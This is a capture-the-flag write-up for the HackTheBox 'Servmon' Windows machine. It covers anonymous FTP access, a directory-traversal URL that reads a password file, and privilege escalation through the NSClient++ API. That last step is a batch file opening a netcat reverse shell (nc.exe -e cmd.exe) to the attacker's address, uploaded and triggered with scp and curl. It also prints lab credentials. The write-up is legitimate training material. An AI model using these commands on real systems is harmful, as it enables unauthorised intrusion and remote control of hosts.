thewhiteh4t logo
esc

HackTheBox - Servmon Write-up

Contents

Information GatheringEnumerationPrivilege Escalation

Information Gathering

Port and service enumeration using nmap

Terminal window
nmap -F -T 5 10.10.10.184 -Pn


Nmap scan report for 10.10.10.184
Host is up (0.19s latency).
Not shown: 92 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5666/tcp open  nrpe
8443/tcp open  https-al

Enumeration

FTP port is open so lets try anonymous login here...

username : anonymous
password : anonymous
Terminal window
$ ftp 10.10.10.184


Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:unknown): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT

Anonymous Login was successful, after some enumeration I found some interesting files and two usernames, downloaded using get command in ftp shell...

Terminal window
get Users/Nadine/Confidential.txt
get Users/Nathan/Notes to do.txt
---
$ cat Confidential.txt
Nathan,


I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.


Regards


Nadine


$ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

On port 80 NVMS 1000 web application was running, a quick google search led to a directory traversal vulnerability so I tried to get this Passwords.txt file...

http://10.10.10.184/../../../Users/Nathan/Desktop/Passwords.txt


--------------------------------
| Username : Nadine            |
| Password : L1k3B1gBut7s@W0rk |
--------------------------------

SSH service was also active as we can see in the nmap scan so next step was to login using these credentials...

Terminal window
$ scp Nadine@10.10.10.184:Desktop/user.txt user.txt


# Got User!

Privilege Escalation

In Confidential.txt NSClient is mentioned so it was time for some more digging...

Terminal window
> dir /s *nsclient*


Directory of C:\Program Files\NSClient++


10/04/2020  19:32             2,683 nsclient.ini
21/04/2020  08:27            29,651 nsclient.log
               2 File(s)         32,334 bytes

For reading files there were two easy ways here...

Terminal window
type nsclient.ini


# OR


nscp web -- password --display


---------------------------
; Undocumented key
password = ew2x6SsGTxjRwXOT


; Undocumented key
allowed hosts = 127.0.0.1
----------------------------

Only localhost is allowed...solution is to use an SSH tunnel and then we can visit the webpage

Terminal window
ssh -L 8443:127.0.0.1:8443 Nadine@10.10.10.184

After some poking around in the web page and some NSClient++ manual reading the best way to exploit this was to use the API, first I created a small .bat file and uploaded it to temp directory, after that privesc needs just two commands...

Terminal window
$ cat twh.bat
@echo off
c:\temp\nc.exe 10.10.14.54 443 -e cmd.exe


$ scp twh.bat Nadine@10.10.10.184:c:/temp/twh.bat
$ scp nc.exe Nadine@10.10.10.184:c:/temp/nc.exe

and now finally...

Terminal window
$ curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/twh.bat --data-binary @twh.bat


> C:\Program Files\NSClient++>check_nrpe.exe -c twh


# Got Root!

Tags

ctf stegano stego windows injector cve poc rce kde dos

Other Posts

HackTheBox Armageddon Write Up
hack-the-box

HackTheBox Armageddon Write Up

thewhiteh4t

HackTheBox Jewel Write Up
hack-the-box

HackTheBox Jewel Write Up

thewhiteh4t

HackTheBox Omni Walkthrough
hack-the-box

HackTheBox Omni Walkthrough

thewhiteh4t